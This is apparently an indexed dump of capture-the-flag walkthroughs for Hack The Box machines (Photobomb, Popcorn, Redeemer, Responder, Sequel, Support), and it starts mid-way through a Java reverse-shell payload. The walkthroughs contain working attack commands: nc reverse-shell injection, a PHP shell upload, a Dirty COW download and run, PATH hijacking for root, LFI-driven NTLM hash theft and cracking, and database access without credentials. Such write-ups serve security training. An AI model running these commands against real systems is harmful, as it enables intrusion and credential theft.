String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
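Before running it, have a listener waiting on the attacker machine; the port matches the one hard-coded in the payload:

```bash
nc -lnvp 1234
```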

                        After that:

```bash
whoami
cat /root/flag.txt
```
                        ","tags":["walkthrough"]},{"location":"htb-photobomb/","title":"Walkthrough - Photobomb, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-photobomb/#about-the-machine","title":"About the machine","text":"data Machine Photobomb Platform Hackthebox url link creator slartibartfast OS Linux Release data 08 October 2022 Difficulty Easy Points 20 ip 10.10.11.182","tags":["walkthrough"]},{"location":"htb-photobomb/#recon","title":"Recon","text":"

For convenience, we'll create a variable:

```bash
export ip=10.10.11.182
```
                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#service-port-enumeration","title":"Service/ Port enumeration","text":"

Run nmap to enumerate open ports, services, OS, and traceroute.

First, a general scan, so as not to make too much noise:

```bash
sudo nmap $ip -Pn
```

Results:

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-20 12:34 EDT
Nmap scan report for 10.10.11.182
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Once you know the open ports, run nmap again to see service versions and more details:

```bash
sudo nmap -sCV -p22,80 $ip
```

Results:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We open 10.10.11.182 in the browser. A redirection to http://photobomb.htb occurs, but the server is not found. So we add this mapping to our /etc/hosts file:

We open the /etc/hosts file with an editor, for instance nano:

```bash
sudo nano /etc/hosts
```

We move the cursor to the end and add this line:

```
10.10.11.182    photobomb.htb
```

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#directory-enumeration","title":"Directory enumeration","text":"

                        We can use dirbuster to enumerate directories:

```bash
dirbuster
```
                        And we configure it to launch this dictionary: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

                        Results:

```
Dirs found with a 200 response:

/

Dirs found with a 401 response:

/printer/
/printers/
/printerfriendly/
/printer_friendly/
/printer_icon/
/printer-icon/
/printer-friendly/
/printerFriendly/
/printersupplies/
/printer1/

--------------------------------
Files found during testing:

Files found with a 401 response:

/printer
/printer.php
/printers.php
/printerfriendly.php
/printer_friendly.php
/printer_icon.php
/printer-friendly.php
/printerFriendly.php
/printersupplies.php
/printer1.php

Files found with a 200 response:

/photobomb.js
```

While we wait, we do some DNS enumeration.

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#dns-enumeration","title":"DNS enumeration","text":"

                        Running:

```bash
nslookup
```

And after that:

```
> SERVER 10.10.11.182
```

Results:

```
Default server: 10.10.11.182
Address: 10.10.11.182#53
```

Then, we run:

```
> 10.10.11.182
```

And as a result, we have:

```
** server can't find 182.11.10.10.in-addr.arpa: NXDOMAIN
```

So there is no result.

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#exploiting-the-login-page","title":"Exploiting the login page","text":"

At http://photobomb.htb/printer we find a login page. Use Burp to capture the request of a failed login using "username" as username and "password" as password.

```
GET /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://photobomb.htb/
Upgrade-Insecure-Requests: 1
Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
```
The Authorization header is the text "username:password" encoded in Base64, which is known as the Basic HTTP authentication scheme.
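You can reproduce the decoding locally (the string below is the one from the captured request):

```bash
echo 'dXNlcm5hbWU6cGFzc3dvcmQ=' | base64 -d
# username:password
```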

                        After trying to brute force the login page with different seclist dictionaries, we decided to have a look at the only file with response 200 in the directory enumeration: http://photobomb.htb/photobomb.js, and bingo! The user and password are there:

```javascript
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;
```
We log in to the web with:

• user: pH0t0
• password: b0Mb!

After entering user and password, a panel to download images is displayed. Capturing with Burp Suite the HTTP request to download an image, we have:

```
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000
```

Playing with this request in Burp Suite's Repeater module, we can infer that the site is written in Ruby. Testing the three request parameters (photo, filetype, and dimensions), we discover that filetype is injectable. We can append either a Ruby reverse shell or a netcat one; Python doesn't work for us here. I go for an nc reverse shell, URL-encoded like this:

```
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.80+24444+>/tmp/f&dimensions=3000x2000
```

                        Now, on the attacker machine (mine is 10.10.14.80), we listen on port 24444:

                        nc -lnvp 24444\n
                        Once the attacker machine is listening, we go back to the Repeater module in Burp Suite and launch the attack with the Send button. We obtain a reverse shell on the attacker machine.

                        After that, we run:

                        whoami\ncat /home/wizard/user.txt\n
                        to get the user flag: *****

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#getting-the-system-flag","title":"Getting the system flag","text":"

                        We run some basic commands:

                        id\n
                        Results:
                        uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)\n
                        echo $SHELL\n
                        Results:
                        /bin/bash\n
                        uname -a\n
                        Results:
                        Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux\n
                        sudo -l\n

                        Results:

                        Matching Defaults entries for wizard on photobomb:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser wizard may run the following commands on photobomb:\n    (root) SETENV: NOPASSWD: /opt/cleanup.sh\n

                        Two interesting things here: 1. our user can set environment variables when invoking sudo (SETENV), and 2. our user can execute /opt/cleanup.sh as root with no password. Having a look at /opt/cleanup.sh, we can see the command \"find\" invoked with a relative path:

                        #!/bin/bash\n. /opt/.bashrc\ncd /home/wizard/photobomb\n\n# clean up log files\nif [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]\nthen\n  /bin/cat log/photobomb.log > log/photobomb.log.old\n  /usr/bin/truncate -s0 log/photobomb.log\nfi\n\n# protect the priceless originals\nfind source_images -type f -name '*.jpg' -exec chown root:root {} \\;\n
                        Knowing that we can set environment variables, we are going to create an executable file named find in our home folder, and then prepend that folder to the $PATH passed to sudo. With that, executing /opt/cleanup.sh will run our find and escalate to root.

                        cd ~\necho bash > find\nchmod +x find\nsudo PATH=$PWD:$PATH /opt/cleanup.sh\n
                        Now, we are root:

                        id\n

                        Results:

                        uid=0(root) gid=0(root) groups=0(root)\n

                        And the flag:

                        cat root.txt\n
                        Results: *******

                        ","tags":["walkthrough"]},{"location":"htb-popcorn/","title":"Popcorn - A HackTheBox machine","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-usertxt","title":"Flag user.txt","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#reconnaissance","title":"Reconnaissance","text":"
                        nmap -sC -sV -Pn 10.10.10.6 -p-\n

                        Result:

                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)\n|_  2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)\n80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))\n|_http-title: Site doesn't have a title (text/html).\n|_http-server-header: Apache/2.2.12 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#enumeration","title":"Enumeration","text":"
                        dirb http://10.10.10.6 /usr/share/wordlists/dirb/common.txt\n

                        First result:

                        ---- Scanning URL: http://10.10.10.6/ ----\n+ http://10.10.10.6/.bash_history (CODE:200|SIZE:320)\n+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)\n+ http://10.10.10.6/index (CODE:200|SIZE:177)\n+ http://10.10.10.6/index.html (CODE:200|SIZE:177)\n+ http://10.10.10.6/server-status (CODE:403|SIZE:291)\n+ http://10.10.10.6/test (CODE:200|SIZE:47330)\n==> DIRECTORY: http://10.10.10.6/torrent/\n

                        Browsing to http://10.10.10.6/.bash_history gives a hint about how to escalate privileges later on:

                        Looks like someone exploited a Dirty COW vulnerability here. La la la la.
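                        The same file can be pulled from the CLI:

                        curl http://10.10.10.6/.bash_history\n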

                        But let's browse the directory http://10.10.10.6/torrent/

                        Browsing around we can identify a login page at http://popcorn.htb/torrent/login.php. This login page is vulnerable to SQLi.

                        We can use sqlmap to dump the users database:

                        sqlmap --url http://popcorn.htb/torrent/login.php --data=\"username=lele&password=lalala\" -D torrenthoster -T users --dump --batch\n

                        Here, someone created a user before me:

                        But since registration is open, we will create our own user to log in to the application.

                        Once you are logged in, browse around. There is a panel to upload your torrents.

                        Play with it: uploading a reverse shell is not allowed there. But there is also another panel to edit an existing upload:

                        The screenshot file is not properly sanitized. Try to upload a pentestmonkey PHP reverse shell, capturing the request with Burp Suite. Modify the Content-Type header to \"image/png\" and...
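                        A hedged sketch of the relevant part of the edited upload request (the form field name and filename are illustrative, not taken from the site):

                        Content-Disposition: form-data; name=\"screenshot\"; filename=\"shell.php\"\nContent-Type: image/png\n\n<?php // pentestmonkey php-reverse-shell payload ... ?>\n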

                        The reverse shell is uploaded. Get netcat listening on port 1234 (or another port):

                        nc -lnvp 1234\n

                        Click on the \"Image File not Found\" button and... bingo! You have a shell on your listener.

                        Spawn your shell.

                        python -c 'import pty; pty.spawn(\"/bin/bash\")'\n
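                        Optionally, the standard follow-up to turn this into a fully interactive TTY (a generic technique, not specific to this box):

                        # press Ctrl+Z to background the shell, then on the attacker machine:\nstty raw -echo; fg\n# back in the remote shell:\nexport TERM=xterm\n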

                        Get user's flag in /home/george/user.txt

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-roottxt","title":"Flag root.txt","text":"

                        From the previous user's history we know this machine probably has a Dirty COW vulnerability. But first we can serve the LinPEAS script from our machine.
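                        One simple way to serve it, assuming linpeas.sh is already in the attacker machine's current directory:

                        python3 -m http.server 80\n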

                        Now in the victim's machine:

                        wget http://<attacker IP>/linpeas.sh\nchmod +x linpeas.sh\n./linpeas.sh\n

                        Results:

                        \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Executing Linux Exploit Suggester\n\u255a https://github.com/mzet-/linux-exploit-suggester                                                                         \n[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson                                                                \n\n   Details: http://vulnfactory.org/exploits/full-nelson.c\n   Exposure: highly probable\n   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}\n   Download URL: http://vulnfactory.org/exploits/full-nelson.c\n\n[+] [CVE-2016-5195] dirtycow\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04\n   Download URL: https://www.exploit-db.com/download/40611\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2016-5195] dirtycow 2\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}\n   Download URL: https://www.exploit-db.com/download/40839\n   ext-url: https://www.exploit-db.com/download/40847\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2010-3904] rds\n\n   Details: http://www.securityfocus.com/archive/1/514379\n   Exposure: probable\n   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},[ ubuntu=10.10|9.10 ],fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}\n   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c\n\n[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson\n\n   Details: https://www.exploit-db.com/exploits/17787/\n   Exposure: probable\n   Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}\n   Download URL: https://www.exploit-db.com/download/17787\n\n[+] [CVE-2010-1146] reiserfs\n\n   Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/\n   Exposure: probable\n   Tags: [ ubuntu=9.10 ]\n   Download URL: https://jon.oberheide.org/files/team-edward.py\n\n[+] [CVE-2010-0832] PAM MOTD\n\n   Details: https://www.exploit-db.com/exploits/14339/\n   Exposure: probable\n   Tags: [ ubuntu=9.10|10.04 ]\n   Download URL: https://www.exploit-db.com/download/14339\n   Comments: SSH access to non privileged user is needed\n\n[+] [CVE-2021-3156] sudo Baron Samedit\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: mint=19,ubuntu=18|20, debian=10\n   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-3156] sudo Baron Samedit 2\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10\n   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-22555] Netfilter heap out-of-bounds write\n\n   
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html\n   Exposure: less probable\n   Tags: ubuntu=20.04{kernel:5.8.0-*}\n   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c\n   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c\n   Comments: ip_tables kernel module must be loaded\n\n[+] [CVE-2019-18634] sudo pwfeedback\n\n   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/\n   Exposure: less probable\n   Tags: mint=19\n   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c\n   Comments: sudo configuration requires pwfeedback to be enabled.\n\n[+] [CVE-2017-6074] dccp\n\n   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3\n   Exposure: less probable\n   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}\n   Download URL: https://www.exploit-db.com/download/41458\n   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass\n\n[+] [CVE-2017-5618] setuid screen v4.5.0 LPE\n\n   Details: https://seclists.org/oss-sec/2017/q1/184\n   Exposure: less probable\n   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154\n

                        The second Dirty COW exploit works just fine: https://www.exploit-db.com/exploits/40839

                        Serve it from your attacker machine. And from the victim's:

                        wget http://<attacker machine>/40839.c\n\n# Compile with:\ngcc -pthread 40839.c -o dirty -lcrypt\n\n# Then run the newly created binary by either doing:\n./dirty\n# or\n./dirty <my-new-password>\n

                        Now, su to the user created by the exploit (it replaces root in /etc/passwd), and you will be that user, substituting root.
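                        With exploit 40839 specifically, the new user is named firefart by default, so the final step looks like this (a sketch; the password is whatever you passed to ./dirty):

                        su firefart\n# Password: <my-new-password>\nid\n# uid=0(firefart) gid=0(root) groups=0(root)\n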

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-redeemer/","title":"Walkthrough - A HackTheBox machine - Redeemer","text":"

                        Enumerate open ports/services:

                        nmap -sC -sV $ip -Pn -p-\n

                        Results:

                        PORT     STATE SERVICE VERSION\n6379/tcp open  redis   Redis key-value store 5.0.7\n

                        See [6379 Redis Cheat sheet](6379-redis.md).

                        Exploitation:

                        \u2514\u2500$ redis-cli -h 10.129.136.187 -p 6379\n10.129.136.187:6379> INFO keyspace\n# Keyspace\ndb0:keys=4,expires=0,avg_ttl=0\n(0.60s)\n10.129.136.187:6379> select 0\nOK\n10.129.136.187:6379> keys *\n1) \"temp\"\n2) \"numb\"\n3) \"flag\"\n4) \"stor\"\n10.129.136.187:6379> get flag\n\"03e1d2b376c37ab3f5319922053953eb\"\n
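                        The other keys returned by keys * can be read the same way:

                        10.129.136.187:6379> get temp\n10.129.136.187:6379> get numb\n10.129.136.187:6379> get stor\n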

                        ","tags":["walkthrough","redis"]},{"location":"htb-responder/","title":"Responder - A HackTheBox machine","text":"
                        nmap -sC -A 10.129.95.234 -Pn -p-\n

                        Open ports: 80 (HTTP) and 5985 (WinRM).

                        Browsing to port 80, we are redirected to http://unika.htb, so we will add this to /etc/hosts.

                        echo \"10.129.95.234    unika.htb\" | sudo tee -a /etc/hosts\n

                        After that, we can browse the web and wander around.

                        There is an LFI (Local File Inclusion) vulnerability at the endpoint http://unika.htb/index.php?page=french.html. This is the request in Burp Suite:

                        GET /index.php?page=../../../../../../../../windows/win.ini HTTP/1.1\nHost: unika.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://unika.htb/index.php?page=french.html\nUpgrade-Insecure-Requests: 1\n

                        From previous responses we know that we face a PHP server (version 8.1.1) running on Windows, so we can use some payloads for interesting Windows files. In this case, we would need some crafting to remove the \"c:/\" part; we can do it with the \"cut\" command.
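                        A minimal sketch of that crafting, assuming a wordlist of Windows paths that start with \"c:/\" (the file names are hypothetical):

                        # strip the leading \"c:/\" (3 characters) from every payload\ncut -c4- windows-files.txt > lfi-payloads.txt\n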

                        We are going to use the tool Responder.py to capture the NTLM hash from the server. The idea is to mount an SMB server on our attacker machine with Responder; when we make the web server include a file from our share, Responder captures the NetNTLMv2 hash.

                        git clone https://github.com/lgandx/Responder.git   \ncd Responder\nsudo pip install -r requirements.txt\n./Responder.py -I tun1 -w -d\n

                        From the browser, point the page parameter at our SMB share: http://unika.htb/index.php?page=//<attacker IP>/<share>. In my case:

                        http://unika.htb/index.php?page=//10.10.14.2/lalala\n

                        Now, from the Responder prompt we will have the hash:

                        [SMB] NTLMv2-SSP Client   : 10.129.95.234\n[SMB] NTLMv2-SSP Username : RESPONDER\\Administrator\n[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\n

                        The NetNTLMv2 hash includes both the challenge (random text) and the encrypted response.

                        # Save hash in a file\necho \"Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\" > hash.txt\n

                        Crack it with John the Ripper.

                        john -w=/usr/share/wordlists/rockyou.txt hash.txt\n

                        Results:

                        Using default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbadminton        (Administrator)     \n1g 0:00:00:00 DONE (2023-05-03 14:51) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo\nUse the \"--show --format=netntlmv2\" options to display all of the cracked passwords reliably\nSession completed. \n

                        So the password for Administrator is badminton.

                        Now, we will connect to WinRM (the Windows Remote Management service) on the target and try to get a session. For that, there is a tool called Evil-WinRM.

                        evil-winrm -i <VictimIP> -u <username> -p <password>\n\n# In my case: \nevil-winrm -i 10.129.95.234 -u Administrator -p badminton\n

                        You will get a PowerShell session. Browse around to find flag.txt.

                        To echo it:

                        type c:/users/mike/Desktop/flag.txt\n
                        ","tags":["walkthrough","NTLM credential stealing","responder.py","local file inclusion","php include","web pentesting"]},{"location":"htb-sequel/","title":"Sequel - A HackTheBox machine","text":"
                        nmap -sC -A 10.129.95.232 -Pn\n

                        Results:

                        Nmap scan report for 10.129.95.232\nHost is up (0.044s latency).\nNot shown: 999 closed tcp ports (conn-refused)\nPORT     STATE SERVICE VERSION\n3306/tcp open  mysql?\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1\n|   Thread ID: 91\n|   Capabilities flags: 63486\n|   Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, FoundRows, SupportsTransactions, DontAllowDatabaseTableColumn, ODBCClient, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: d7$M6g&&+DSV7PkJptwz\n|_  Auth Plugin Name: mysql_native_password\n

                        Connect to the database with the mariadb client:

                        mariadb -h 10.129.95.232 -u root\n
                        MariaDB [(none)]> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| htb                |\n| information_schema |\n| mysql              |\n| performance_schema |\n+--------------------+\n4 rows in set (0.049 sec)\n\nMariaDB [(none)]> use htb;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\nDatabase changed\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.046 sec)\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.047 sec)\n\n\nMariaDB [htb]> show columns from config;\n+-------+---------------------+------+-----+---------+----------------+\n| Field | Type                | Null | Key | Default | Extra          |\n+-------+---------------------+------+-----+---------+----------------+\n| id    | bigint(20) unsigned | NO   | PRI | NULL    | auto_increment |\n| name  | text                | YES  |     | NULL    |                |\n| value | text                | YES  |     | NULL    |                |\n+-------+---------------------+------+-----+---------+----------------+\n3 rows in set (0.046 sec)\n\n\nMariaDB [htb]> select id, name, value from config;\n+----+-----------------------+----------------------------------+\n| id | name                  | value                            |\n+----+-----------------------+----------------------------------+\n|  1 | timeout               | 60s                              |\n|  2 | security              | default                          |\n|  3 | auto_logon            | false                            |\n|  4 | max_size              | 2M                               |\n|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |\n|  6 | enable_uploads        | false                            |\n|  7 | authentication_method | radius                           |\n+----+-----------------------+----------------------------------+\n7 rows in set (0.046 sec)\n
                        ","tags":["walkthrough","sql","port 3306","mariadb"]},{"location":"htb-support/","title":"Walkthrough - Support, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-support/#about-the-machine","title":"About the machine","text":"data Machine Support Platform Hackthebox url link creator 0xdf OS Windows Release data 30 July 2022 Difficulty Easy Points 20 ip 10.10.11.174","tags":["walkthrough"]},{"location":"htb-support/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

                        Run:

                        export ip=10.10.11.174\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-support/#service-port-enumeration","title":"Service/ Port enumeration","text":"

                        Run nmap to enumerate open ports, services, OS, and traceroute. Do a general scan first so as not to make too much noise:

                        sudo nmap $ip -Pn\n

                        Results:

                        Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE\n53/tcp   open  domain\n88/tcp   open  kerberos-sec\n135/tcp  open  msrpc\n139/tcp  open  netbios-ssn\n389/tcp  open  ldap\n445/tcp  open  microsoft-ds\n464/tcp  open  kpasswd5\n593/tcp  open  http-rpc-epmap\n636/tcp  open  ldapssl\n3268/tcp open  globalcatLDAP\n3269/tcp open  globalcatLDAPssl\n\nNmap done: 1 IP address (1 host up) scanned in 7.90 seconds\n

                        Once you know open ports, run nmap to see service versions and more details:

                        sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 $ip\n

                        Results:

                        Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE       VERSION\n53/tcp   open  domain        Simple DNS Plus\n88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-08 15:56:45Z)\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n445/tcp  open  microsoft-ds?\n464/tcp  open  kpasswd5?\n593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636/tcp  open  tcpwrapped\n3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n3269/tcp open  tcpwrapped\nService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-time:\n|   date: 2022-11-08T15:56:49\n|_  start_date: N/A\n| smb2-security-mode:\n|   3.1.1:\n|_    Message signing enabled and required\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 49.69 seconds\nzsh: segmentation fault  sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 $ip\n

                        A few facts that you can gather after running this scan are:

                        • There is a Windows Server running Active Directory LDAP on the machine.
                        • LDAP and Kerberos are available.
